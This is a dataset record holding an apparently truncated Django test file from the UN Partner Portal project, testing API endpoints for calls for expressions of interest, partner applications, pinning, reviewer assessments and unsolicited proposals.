hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ad6481c6f0cad4d3408f96bc3d8693179d3765ed | 64,588 | py | Python | backend/unpp_api/apps/project/tests/test_views.py | unicef/un-partner-portal | 73afa193a5f6d626928cae0025c72a17f0ef8f61 | [
"Apache-2.0"
] | 6 | 2017-11-21T10:00:44.000Z | 2022-02-12T16:51:48.000Z | backend/unpp_api/apps/project/tests/test_views.py | unicef/un-partner-portal | 73afa193a5f6d626928cae0025c72a17f0ef8f61 | [
"Apache-2.0"
] | 995 | 2017-07-31T02:08:36.000Z | 2022-03-08T22:44:03.000Z | backend/unpp_api/apps/project/tests/test_views.py | unicef/un-partner-portal | 73afa193a5f6d626928cae0025c72a17f0ef8f61 | [
"Apache-2.0"
] | 1 | 2021-07-21T10:45:15.000Z | 2021-07-21T10:45:15.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import random
from datetime import date, timedelta
import mock
from dateutil.relativedelta import relativedelta
from django.core.management import call_command
from django.test import override_settings
from django.urls import reverse
from django.conf import settings
from django.core import mail
from rest_framework import status
from account.models import User
from agency.agencies import UNICEF, WFP
from agency.models import Agency
from agency.roles import VALID_FOCAL_POINT_ROLE_NAMES, AgencyRole
from common.headers import CustomHeader
from notification.consts import NotificationType, NOTIFICATION_DATA
from partner.roles import PartnerRole
from partner.serializers import PartnerShortSerializer
from project.models import Assessment, Application, EOI, Pin
from partner.models import Partner
from common.tests.base import BaseAPITestCase
from common.factories import (
OpenEOIFactory,
AgencyMemberFactory,
PartnerSimpleFactory,
PartnerMemberFactory,
AgencyOfficeFactory,
AgencyFactory,
PartnerVerificationFactory,
UserFactory,
PartnerFactory,
get_new_common_file,
DirectEOIFactory, FinalizedEOIFactory)
from common.models import Specialization, CommonFile
from common.consts import (
SELECTION_CRITERIA_CHOICES,
JUSTIFICATION_FOR_DIRECT_SELECTION,
APPLICATION_STATUSES,
COMPLETED_REASON,
CFEI_TYPES,
CFEI_STATUSES,
EXTENDED_APPLICATION_STATUSES,
)
from project.views import PinProjectAPIView
from project.serializers import ConvertUnsolicitedSerializer
filename = os.path.join(settings.PROJECT_ROOT, 'apps', 'common', 'tests', 'test.doc')
class TestPinUnpinWrongEOIAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_PARTNER
def test_pin_unpin_project_wrong_eois(self):
url = reverse('projects:pins')
response = self.client.patch(url, data={"eoi_ids": [1, 2, 3], "pin": True})
self.assertResponseStatusIs(response, status_code=status.HTTP_400_BAD_REQUEST)
self.assertEquals(response.data['non_field_errors'], PinProjectAPIView.ERROR_MSG_WRONG_EOI_PKS)
self.assertEquals(Pin.objects.count(), 0)
class TestPinUnpinEOIAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_PARTNER
quantity = 2
url = reverse('projects:pins')
def setUp(self):
super(TestPinUnpinEOIAPITestCase, self).setUp()
AgencyOfficeFactory.create_batch(self.quantity)
AgencyMemberFactory.create_batch(self.quantity)
OpenEOIFactory.create_batch(self.quantity, is_published=True)
def test_pin_unpin_project_wrong_params(self):
eoi_ids = EOI.objects.all().values_list('id', flat=True)
response = self.client.patch(self.url, data={"eoi_ids": eoi_ids, "pin": None})
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEquals(response.data['non_field_errors'], PinProjectAPIView.ERROR_MSG_WRONG_PARAMS)
self.assertEquals(Pin.objects.count(), 0)
def test_pin_unpin_project(self):
# add pins
eoi_ids = EOI.objects.all().values_list('id', flat=True)
response = self.client.patch(self.url, data={"eoi_ids": eoi_ids, "pin": True})
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
self.assertEquals(Pin.objects.count(), self.quantity)
self.assertEquals(response.data["eoi_ids"], list(eoi_ids))
# read pins
response = self.client.get(self.url)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['count'], self.quantity)
# delete pins
response = self.client.patch(self.url, data={"eoi_ids": eoi_ids, "pin": False})
self.assertResponseStatusIs(response, status_code=status.HTTP_204_NO_CONTENT)
self.assertEquals(Pin.objects.count(), 0)
class TestOpenProjectsAPITestCase(BaseAPITestCase):
quantity = 2
url = reverse('projects:open')
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
def setUp(self):
super(TestOpenProjectsAPITestCase, self).setUp()
AgencyOfficeFactory.create_batch(self.quantity)
AgencyMemberFactory.create_batch(self.quantity)
PartnerMemberFactory.create_batch(self.quantity)
OpenEOIFactory.create_batch(self.quantity, agency=self.user.agency)
def test_open_project(self):
# read open projects
response = self.client.get(self.url)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['count'], self.quantity)
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_create_patch_project(self):
ao = self.user.agency_members.first().office
payload = {
'title': "EOI title",
'agency': ao.agency.id,
'focal_points': [
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=ao).user.id
],
'locations': [
{
"admin_level_1": {"name": "Baghdad", "country_code": 'IQ'},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
{
"admin_level_1": {"name": "Paris", "country_code": "FR"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
],
'agency_office': ao.id,
'specializations': Specialization.objects.all().values_list('id', flat=True)[:2],
'description': 'Brief background of the project',
'other_information': 'Other information',
"clarification_request_deadline_date": date.today(),
'start_date': date.today(),
'end_date': date.today(),
'deadline_date': date.today(),
'notif_results_date': date.today(),
'has_weighting': True,
'assessments_criteria': [
{'selection_criteria': SELECTION_CRITERIA_CHOICES.sector, 'weight': 10},
{'selection_criteria': SELECTION_CRITERIA_CHOICES.local, 'weight': 40},
],
}
response = self.client.post(self.url, data=payload)
self.assertResponseStatusIs(response, status_code=status.HTTP_400_BAD_REQUEST)
self.assertEquals(
response.data['assessments_criteria'],
['The sum of all weight criteria must be equal to 100.']
)
payload['assessments_criteria'].extend([
{'selection_criteria': SELECTION_CRITERIA_CHOICES.cost, 'weight': 20},
{'selection_criteria': SELECTION_CRITERIA_CHOICES.innovative, 'weight': 30},
])
response = self.client.post(self.url, data=payload)
self.assertResponseStatusIs(response, status_code=status.HTTP_201_CREATED)
eoi = EOI.objects.order_by('id').last()
self.assertEquals(response.data['title'], payload['title'])
self.assertEquals(eoi.created_by.id, self.user.id)
self.assertEquals(response.data['id'], eoi.id)
self.assertTrue(eoi.is_weight_adjustments_ok, 'The sum of all weight criteria must be equal to 100.')
# invite partners
url = reverse('projects:eoi-detail', kwargs={"pk": eoi.id})
payload = {
"invited_partners": PartnerShortSerializer([
Partner.objects.first(), Partner.objects.last()
], many=True).data
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['id'], eoi.id)
self.assertTrue(Partner.objects.first().id in [p['id'] for p in response.data['invited_partners']])
self.assertTrue(Partner.objects.count(), len(response.data['invited_partners']))
call_command('send_daily_notifications')
notification_emails = list(filter(
lambda msg: f'/cfei/open/{eoi.id}/overview' in msg.body,
mail.outbox
))
self.assertTrue(len(notification_emails) >= 1)
payload = {
"invited_partners": PartnerShortSerializer([Partner.objects.last()], many=True).data
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['id'], eoi.id)
self.assertTrue(Partner.objects.last().id in [p['id'] for p in response.data['invited_partners']])
self.assertTrue(Partner.objects.count(), 1)
self.assertTrue(len(response.data['invited_partners']), 1)
self.assertTrue(len(mail.outbox) > 0) # mail.outbox is in shared resource, can have also other mails
mail.outbox = []
# edit EOI - dates & focal point(s)
payload = {
"start_date": date.today() - timedelta(days=10),
"end_date": date.today() + timedelta(days=20),
"deadline_date": date.today() + timedelta(days=10),
"notif_results_date": date.today() + timedelta(days=15),
"focal_points": [
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=ao).user.id,
]
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['notif_results_date'], str(date.today() + timedelta(days=15)))
# complete this CFEI
justification = "mission completed"
payload = {
"justification": justification,
"completed_reason": COMPLETED_REASON.cancelled,
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['completed_reason'], COMPLETED_REASON.cancelled)
self.assertTrue(response.data['completed_date'])
self.assertTrue(response.data['is_completed'])
self.assertEquals(response.data['justification'], justification)
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_patch_locations_for_project(self):
cfei = OpenEOIFactory(created_by=self.user)
details_url = reverse('projects:eoi-detail', kwargs={'pk': cfei.id})
details_response = self.client.get(details_url)
self.assertResponseStatusIs(details_response)
initial_locations = details_response.data['locations']
new_locations_payload = {
'locations': [
{
"admin_level_1": {"name": "Baghdad", "country_code": 'IQ'},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
{
"admin_level_1": {"name": "Paris", "country_code": "FR"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
],
}
update_response = self.client.patch(details_url, data=new_locations_payload)
self.assertResponseStatusIs(update_response)
self.assertEqual(
len(new_locations_payload['locations']),
len(update_response.data['locations'])
)
second_update_payload = {
'locations': [
{
"admin_level_1": {"name": "Poland", "country_code": 'PL'},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
] + initial_locations,
}
second_update_response = self.client.patch(details_url, data=second_update_payload)
self.assertResponseStatusIs(second_update_response)
self.assertEqual(
len(second_update_payload['locations']),
len(second_update_response.data['locations'])
)
self.assertTrue(
{l['id'] for l in initial_locations}.issubset(
{l['id'] for l in second_update_response.data['locations']}
)
)
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_patch_specializations_for_project(self):
cfei = OpenEOIFactory(created_by=self.user)
details_url = reverse('projects:eoi-detail', kwargs={'pk': cfei.id})
details_response = self.client.get(details_url)
self.assertResponseStatusIs(details_response)
for _ in range(10):
spec_count = random.randint(2, 7)
update_payload = {
'specializations': Specialization.objects.order_by('?').values_list('id', flat=True)[:spec_count],
}
update_response = self.client.patch(details_url, data=update_payload)
self.assertResponseStatusIs(update_response)
self.assertEqual(len(update_response.data['specializations']), spec_count)
class TestDirectProjectsAPITestCase(BaseAPITestCase):
quantity = 2
url = reverse('projects:direct')
user_type = 'agency'
agency_role = AgencyRole.EDITOR_ADVANCED
def setUp(self):
super(TestDirectProjectsAPITestCase, self).setUp()
PartnerSimpleFactory()
AgencyOfficeFactory.create_batch(self.quantity)
AgencyMemberFactory.create_batch(self.quantity)
OpenEOIFactory.create_batch(self.quantity)
# TODO: This test is not deterministic - randomly fails
def test_create_direct_project(self):
ao = self.user.agency_members.first().office
payload = {
'eoi': {
'title': "EOI title",
'agency': ao.agency.id,
'focal_points': [self.user.id],
'locations': [
{
"admin_level_1": {"name": "Baghdad", "country_code": 'IQ'},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
{
"admin_level_1": {"name": "Paris", "country_code": "FR"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
],
'agency_office': ao.id,
'specializations': Specialization.objects.all().values_list('id', flat=True)[:2],
'description': 'Brief background of the project',
'other_information': 'Other information',
'start_date': date.today(),
'end_date': date.today(),
'notif_results_date': date.today(),
'has_weighting': True,
},
'applications': [
{
"partner": Partner.objects.last().id,
"ds_justification_select": [
JUSTIFICATION_FOR_DIRECT_SELECTION.known,
JUSTIFICATION_FOR_DIRECT_SELECTION.local,
],
"ds_attachment": get_new_common_file().id,
"justification_reason": "To save those we love."
},
]
}
response = self.client.post(self.url, data=payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED, msg=response.data)
self.assertEquals(response.data['eoi']['title'], payload['eoi']['title'])
self.assertEquals(response.data['eoi']['created_by'], self.user.id)
self.assertEquals(response.data['eoi']['display_type'], CFEI_TYPES.direct)
self.assertEquals(response.data['eoi']['id'], EOI.objects.order_by('id').last().id)
app = Application.objects.get(pk=response.data['applications'][0]['id'])
self.assertEquals(app.submitter, self.user)
self.assertEquals(
app.ds_justification_select,
[JUSTIFICATION_FOR_DIRECT_SELECTION.known, JUSTIFICATION_FOR_DIRECT_SELECTION.local]
)
app = Application.objects.get(pk=response.data['applications'][0]['id'])
self.assertEquals(app.submitter, self.user)
self.assertEquals(
app.ds_justification_select,
[JUSTIFICATION_FOR_DIRECT_SELECTION.known, JUSTIFICATION_FOR_DIRECT_SELECTION.local]
)
self.assertIsNotNone(response.data['applications'][-1]['ds_attachment'])
class TestPartnerApplicationsAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_PARTNER
def setUp(self):
super(TestPartnerApplicationsAPITestCase, self).setUp()
AgencyOfficeFactory.create_batch(self.quantity)
AgencyMemberFactory.create_batch(self.quantity)
OpenEOIFactory.create_batch(self.quantity, display_type='NoN')
PartnerSimpleFactory.create_batch(self.quantity)
@mock.patch('partner.models.Partner.profile_is_complete', lambda _: True)
def test_create(self):
self.client.set_headers({
CustomHeader.PARTNER_ID.value: self.user.partner_members.first().partner.id
})
eoi_id = EOI.objects.first().id
url = reverse('projects:partner-applications', kwargs={"pk": eoi_id})
payload = {
"cn": get_new_common_file().id,
}
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
app = Application.objects.last()
self.assertEquals(response.data['id'], app.id)
self.assertEquals(app.submitter.id, self.user.id)
common_file = CommonFile.objects.create()
common_file.file_field.save('test.csv', open(filename))
payload = {
"cn": common_file.id,
}
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEquals(response.data[0], 'You already applied for this project.')
url = reverse('projects:agency-applications', kwargs={"pk": eoi_id})
payload = {
"partner": Partner.objects.exclude(applications__eoi_id=eoi_id).order_by('?').last().id,
"ds_justification_select": [JUSTIFICATION_FOR_DIRECT_SELECTION.known],
"justification_reason": "a good reason",
}
response = self.client.post(url, data=payload)
expected_msgs = 'You do not have permission to perform this action.'
self.assertEquals(response.data['detail'], expected_msgs)
class TestAgencyApplicationsAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
def setUp(self):
super(TestAgencyApplicationsAPITestCase, self).setUp()
AgencyMemberFactory.create_batch(self.quantity)
PartnerSimpleFactory.create_batch(self.quantity)
@mock.patch('partner.models.Partner.profile_is_complete', lambda _: True)
def test_create(self):
eoi = OpenEOIFactory(display_type='NoN', agency=self.user.agency)
eoi.focal_points.add(self.user)
url = reverse('projects:agency-applications', kwargs={"pk": eoi.id})
partner = Partner.objects.last()
PartnerVerificationFactory(partner=partner)
payload = {
"partner": partner.id,
"ds_justification_select": [JUSTIFICATION_FOR_DIRECT_SELECTION.known],
"justification_reason": "a good reason",
}
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
app_id = eoi.applications.last().id
self.assertEqual(response.data['id'], app_id)
eoi.display_type = CFEI_TYPES.direct
eoi.save()
url = reverse('projects:agency-applications-delete', kwargs={"pk": app_id, "eoi_id": eoi.id})
response = self.client.delete(url)
self.assertResponseStatusIs(response, status.HTTP_204_NO_CONTENT)
class TestApplicationsAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
def setUp(self):
super(TestApplicationsAPITestCase, self).setUp()
AgencyOfficeFactory.create_batch(self.quantity)
AgencyMemberFactory.create_batch(self.quantity)
# make sure that creating user is not the current one
creator = UserFactory()
AgencyMemberFactory(user=creator, office=self.user.agency_members.first().office)
self.eoi = OpenEOIFactory(is_published=True, created_by=creator, agency=self.user.agency)
self.eoi.focal_points.clear()
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_read_update_application(self):
application = self.eoi.applications.first()
PartnerMemberFactory.create_batch(5, partner=application.partner)
url = reverse('projects:application', kwargs={"pk": application.id})
response = self.client.get(url)
self.assertResponseStatusIs(response)
self.assertFalse(response.data['did_win'])
self.assertEquals(response.data['ds_justification_select'], [])
payload = {
"status": APPLICATION_STATUSES.preselected,
"ds_justification_select": [JUSTIFICATION_FOR_DIRECT_SELECTION.local],
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEquals(
response.data['non_field_errors'],
['Only Focal Point/Creator is allowed to pre-select/reject an application.']
)
self.client.logout()
creator = application.eoi.created_by
self.client.force_login(creator)
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_403_FORBIDDEN)
creator.agency_members.update(role=AgencyRole.EDITOR_ADVANCED.name)
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_200_OK)
self.assertEquals(response.data['status'], APPLICATION_STATUSES.preselected)
self.assertEquals(response.data['ds_justification_select'], [JUSTIFICATION_FOR_DIRECT_SELECTION.local])
payload = {
"did_win": True,
"status": APPLICATION_STATUSES.preselected,
"justification_reason": "good reason",
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertIn('review_summary_comment', response.data)
application.eoi.review_summary_comment = 'Test comment'
application.eoi.save()
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEquals(
response.data['non_field_errors'],
['You cannot award an application if the profile has not been verified yet.']
)
PartnerVerificationFactory(partner=application.partner, submitter=application.eoi.created_by)
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertIn('application_status', response.data)
self.assertTrue(response.data['did_win'])
self.assertEquals(response.data['status'], APPLICATION_STATUSES.preselected)
call_command('send_daily_notifications')
self.assertTrue(len(mail.outbox) > 0)
mail.outbox = []
partner_user = UserFactory()
PartnerMemberFactory(user=partner_user, partner=application.partner, role=PartnerRole.ADMIN.name)
self.client.force_login(partner_user)
# accept offer
payload = {
"did_accept": True,
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertTrue(response.data['did_accept'])
self.assertEquals(response.data['decision_date'], str(date.today()))
self.client.force_login(application.eoi.created_by)
awarded_partners_response = self.client.get(
reverse('projects:applications-awarded-partners', kwargs={"eoi_id": application.id})
)
self.assertEqual(
awarded_partners_response.status_code, status.HTTP_200_OK, msg=awarded_partners_response.content
)
if awarded_partners_response.data:
self.assertEqual(awarded_partners_response.data[0]['partner_decision_date'], str(date.today()))
self.assertEqual(awarded_partners_response.data[0]['partner_notified'].date(), date.today())
self.client.force_login(partner_user)
payload = {
"did_accept": False,
"did_decline": True,
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertFalse(response.data['did_accept'])
self.assertTrue(response.data['did_decline'])
self.client.force_login(application.eoi.created_by)
reason = "They are better then You."
payload = {
"did_withdraw": True,
"withdraw_reason": reason,
"status": APPLICATION_STATUSES.rejected,
}
response = self.client.patch(url, data=payload)
self.assertTrue(status.is_client_error(response.status_code))
self.assertEquals(
response.data["non_field_errors"], ["Since assessment has begun, application can't be rejected."]
)
application.assessments.all().delete()
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertTrue(response.data['did_win'])
self.assertTrue(response.data['did_withdraw'])
self.assertEquals(response.data["withdraw_reason"], reason)
class TestReviewerAssessmentsAPIView(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
initial_factories = [
PartnerSimpleFactory,
PartnerMemberFactory,
AgencyFactory,
AgencyOfficeFactory,
AgencyMemberFactory,
OpenEOIFactory,
]
def test_add_review(self):
app = Application.objects.first()
app.status = APPLICATION_STATUSES.preselected
app.save()
url = reverse(
'projects:reviewer-assessments',
kwargs={
"application_id": app.id,
"reviewer_id": self.user.id,
}
)
note = 'I like this application, has strong sides...'
payload = {
'scores': [
{'selection_criteria': SELECTION_CRITERIA_CHOICES.sector, 'score': 50},
{'selection_criteria': SELECTION_CRITERIA_CHOICES.local, 'score': 75},
{'selection_criteria': SELECTION_CRITERIA_CHOICES.cost, 'score': 60},
{'selection_criteria': SELECTION_CRITERIA_CHOICES.innovative, 'score': 90},
],
'note': note,
}
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_403_FORBIDDEN)
# add logged agency member to eoi/application reviewers
app.eoi.reviewers.add(self.user)
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.data['non_field_errors'],
['Assessment allowed once deadline is passed.']
)
app.eoi.deadline_date = date.today() - timedelta(days=1)
app.eoi.is_published = True
app.eoi.save()
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.data['non_field_errors'], ["You can score only selection criteria defined in CFEI."]
)
scores = []
for criterion in app.eoi.assessments_criteria:
scores.append({
'selection_criteria': criterion.get('selection_criteria'), 'score': 100
})
payload['scores'] = scores
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEquals(
response.data['non_field_errors'],
["The maximum score is equal to the value entered for the weight."]
)
scores = []
for criterion in app.eoi.assessments_criteria:
scores.append({
'selection_criteria': criterion.get('selection_criteria'), 'score': criterion.get('weight') - 1
})
payload['scores'] = scores
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status_code=status.HTTP_201_CREATED)
self.assertEquals(response.data['date_reviewed'], str(date.today()))
self.assertEquals(len(response.data['scores']), len(payload['scores']))
assessment_id = Assessment.objects.last().id
self.assertEquals(response.data['id'], assessment_id)
url = reverse(
'projects:reviewer-assessments',
kwargs={
"application_id": Application.objects.first().id,
"reviewer_id": self.user.id,
}
)
payload = {
'note': 'patch note test',
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['note'], payload['note'])
self.assertEquals(response.data['id'], assessment_id)
self.assertEquals(Assessment.objects.last().note, payload['note'])
scores = []
for criterion in app.eoi.assessments_criteria:
scores.append({
'selection_criteria': criterion.get('selection_criteria'), 'score': criterion.get('weight') - 3
})
payload = {
'scores': scores,
'note': note,
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_200_OK)
self.assertEquals(response.data['note'], payload['note'])
self.assertEquals(response.data['scores'], payload['scores'])
complete_assessments_url = reverse('projects:eoi-reviewers-complete-assessments', kwargs={"eoi_id": app.eoi.id})
complete_response = self.client.post(complete_assessments_url)
self.assertResponseStatusIs(complete_response)
self.assertTrue(len(complete_response.data) > 0)
self.assertTrue(all([a['completed'] for a in complete_response.data]))
url = reverse(
'projects:reviewer-assessments',
kwargs={
"application_id": Application.objects.first().id,
"reviewer_id": self.user.id,
}
)
payload = {
'note': 'patch note test',
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
class TestCreateUnsolicitedProjectAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_PARTNER
partner_role = PartnerRole.ADMIN
def test_create_convert(self):
url = reverse('projects:applications-unsolicited')
filename = os.path.join(settings.PROJECT_ROOT, 'apps', 'common', 'tests', 'test.doc')
cfile = CommonFile.objects.create()
cfile.file_field.save('test.csv', open(filename))
payload = {
"locations": [
{
"admin_level_1": {"country_code": 'IQ', "name": "Baghdad"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
{
"admin_level_1": {"country_code": "FR", "name": "Paris"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
],
"title": "Unsolicited Project",
"agency": Agency.objects.first().id,
"specializations": Specialization.objects.all()[:3].values_list("id", flat=True),
"cn": cfile.id,
}
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
app = Application.objects.last()
self.assertEquals(response.data['id'], str(app.id))
self.assertEquals(app.cn.id, cfile.id)
self.assertEquals(app.proposal_of_eoi_details['title'], payload['title'])
for idx, item in enumerate(app.proposal_of_eoi_details['specializations']):
self.assertEquals(
str(app.proposal_of_eoi_details['specializations'][idx]),
str(payload['specializations'][idx])
)
self.client.logout()
# create agency members for focal_points and agency member to convert
AgencyMemberFactory()
self.user = User.objects.filter(agency_members__isnull=False).first()
self.client.force_login(self.user)
self.user_type = BaseAPITestCase.USER_AGENCY
self.set_current_user_role(AgencyRole.EDITOR_ADVANCED.name)
self.client.set_headers({
CustomHeader.AGENCY_OFFICE_ID.value: self.user.agency_members.first().office_id
})
url = reverse('projects:convert-unsolicited', kwargs={'pk': response.data['id']})
start_date = date.today()
end_date = date.today() + timedelta(days=30)
office = AgencyOfficeFactory(agency=app.agency)
focal_points = [
am.user.id for am in AgencyMemberFactory.create_batch(
3, role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office
)
]
payload = {
'ds_justification_select': [JUSTIFICATION_FOR_DIRECT_SELECTION.other],
